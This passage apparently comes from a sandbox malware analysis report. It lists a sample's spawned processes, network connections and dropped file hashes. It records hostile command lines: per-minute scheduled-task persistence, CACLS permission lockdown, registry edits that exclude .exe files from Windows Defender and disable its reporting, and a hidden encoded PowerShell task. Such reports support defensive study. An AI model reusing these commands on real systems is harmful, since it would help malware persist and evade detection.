PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe

"C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\2EEB.exe

C:\Users\Admin\AppData\Local\Temp\2EEB.exe

C:\Users\Admin\AppData\Local\Temp\3034.exe

C:\Users\Admin\AppData\Local\Temp\3034.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\31AC.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

C:\Users\Admin\AppData\Local\Temp\3268.exe

C:\Users\Admin\AppData\Local\Temp\3268.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

C:\Users\Admin\AppData\Local\Temp\3334.exe

C:\Users\Admin\AppData\Local\Temp\3334.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

C:\Users\Admin\AppData\Local\Temp\34AC.exe

C:\Users\Admin\AppData\Local\Temp\34AC.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9698e46f8,0x7ff9698e4708,0x7ff9698e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9698e46f8,0x7ff9698e4708,0x7ff9698e4718

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,13907870991774904073,10320258948940097907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,13907870991774904073,10320258948940097907,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3896 -ip 3896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 540

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\B19E.exe

C:\Users\Admin\AppData\Local\Temp\B19E.exe

C:\Users\Admin\AppData\Local\Temp\B42F.exe

C:\Users\Admin\AppData\Local\Temp\B42F.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\C43D.exe

C:\Users\Admin\AppData\Local\Temp\C43D.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C2.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC714.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5868 -ip 5868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 784

C:\Users\Admin\AppData\Local\Temp\is-2IB49.tmp\is-IN51T.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2IB49.tmp\is-IN51T.tmp" /SL4 $4023E "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Users\Admin\AppData\Local\Temp\F14A.exe

C:\Users\Admin\AppData\Local\Temp\F14A.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gegBeNqYW" /SC once /ST 01:05:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gegBeNqYW"

C:\Users\Admin\AppData\Local\Temp\33C.exe

C:\Users\Admin\AppData\Local\Temp\33C.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
TR 185.216.70.222:80 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 15.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
FI 77.91.124.71:4341 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp

Files

memory/1284-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1284-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3340-2-0x0000000002A10000-0x0000000002A26000-memory.dmp

memory/1284-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2EEB.exe

MD5 a602fb933a815818e7daf5c88bb73deb
SHA1 1f7c3c767ad641ee2cc33ce57db7edb4db60c4fb
SHA256 fc55215044da76fe9094b8937599ef7af22a0d235afa260584bb1f24194f9f3f
SHA512 06143730a107f3e4caca39b41b4020f686e86552e1faa53d722dbe4881111de23759574392f43ad2b53ef4d5f3905726e523f49174a9d02846df625f1afa5cfd

C:\Users\Admin\AppData\Local\Temp\2EEB.exe

MD5 a602fb933a815818e7daf5c88bb73deb
SHA1 1f7c3c767ad641ee2cc33ce57db7edb4db60c4fb
SHA256 fc55215044da76fe9094b8937599ef7af22a0d235afa260584bb1f24194f9f3f
SHA512 06143730a107f3e4caca39b41b4020f686e86552e1faa53d722dbe4881111de23759574392f43ad2b53ef4d5f3905726e523f49174a9d02846df625f1afa5cfd

C:\Users\Admin\AppData\Local\Temp\3034.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\3034.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

MD5 6b94af2713b9acf6f65cc6b9e08010ed
SHA1 278404e8fae40569fca7feeda0902bdfa999c804
SHA256 68cb5d45c7f8c3935fd665c5789c55dc095f310480f077240b46e6c878107ab9
SHA512 2f68ac396fe33ad41f4fbed9fdc2826d199fa59cb736ef055fdf3833c80c02e1e9f7e8f5f21ac9660e29b8dd28a6714acc10c9354baac31a4fc4f51f6bb2cfaf

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

MD5 6b94af2713b9acf6f65cc6b9e08010ed
SHA1 278404e8fae40569fca7feeda0902bdfa999c804
SHA256 68cb5d45c7f8c3935fd665c5789c55dc095f310480f077240b46e6c878107ab9
SHA512 2f68ac396fe33ad41f4fbed9fdc2826d199fa59cb736ef055fdf3833c80c02e1e9f7e8f5f21ac9660e29b8dd28a6714acc10c9354baac31a4fc4f51f6bb2cfaf

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

MD5 38e60fa53532e902f5182995962e1af7
SHA1 eaef3607804b8eed29f8c0c307656b101077a6b7
SHA256 6893c3c6fc131cfcb84f64b9b7965eae8a6f05f0cf02d16061dfca5aeceefeee
SHA512 c8d9d9bc2d34d73b2170e6c29814ac450f3a35b4fe101e6ea5eb915784d6da08ed6ecc912f8a8f08cc75bbded8b390b541566b28f734dd8139ed724a67805472

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

MD5 38e60fa53532e902f5182995962e1af7
SHA1 eaef3607804b8eed29f8c0c307656b101077a6b7
SHA256 6893c3c6fc131cfcb84f64b9b7965eae8a6f05f0cf02d16061dfca5aeceefeee
SHA512 c8d9d9bc2d34d73b2170e6c29814ac450f3a35b4fe101e6ea5eb915784d6da08ed6ecc912f8a8f08cc75bbded8b390b541566b28f734dd8139ed724a67805472

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

MD5 f61ae3abc8f1610999e26dc248c7bc37
SHA1 174ae868f65b67a567149612c41cbd05ed48307b
SHA256 32b7453d0765447d59fee8283a8e4d20fed54f5b0f4401e577da6521b90eb356
SHA512 71cab50f87128d737c34b9a7c0873f9aa883b707d80e16e8e7fc26e02f5190793b9dd48a57029f35d98a76336fc0e984358b7aae5448497e13eb62c94f2ff7cb

C:\Users\Admin\AppData\Local\Temp\3268.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

MD5 f61ae3abc8f1610999e26dc248c7bc37
SHA1 174ae868f65b67a567149612c41cbd05ed48307b
SHA256 32b7453d0765447d59fee8283a8e4d20fed54f5b0f4401e577da6521b90eb356
SHA512 71cab50f87128d737c34b9a7c0873f9aa883b707d80e16e8e7fc26e02f5190793b9dd48a57029f35d98a76336fc0e984358b7aae5448497e13eb62c94f2ff7cb

C:\Users\Admin\AppData\Local\Temp\31AC.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\3268.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

MD5 903df47765bf667e558b3bf3dd61b5d6
SHA1 bcfb0cc665d93f98c3fc3e6225e1b4b813110b92
SHA256 3ceebf3a8bb014477fd423ed56b8674ab495b4ae4f37029fcde34ee240788bb5
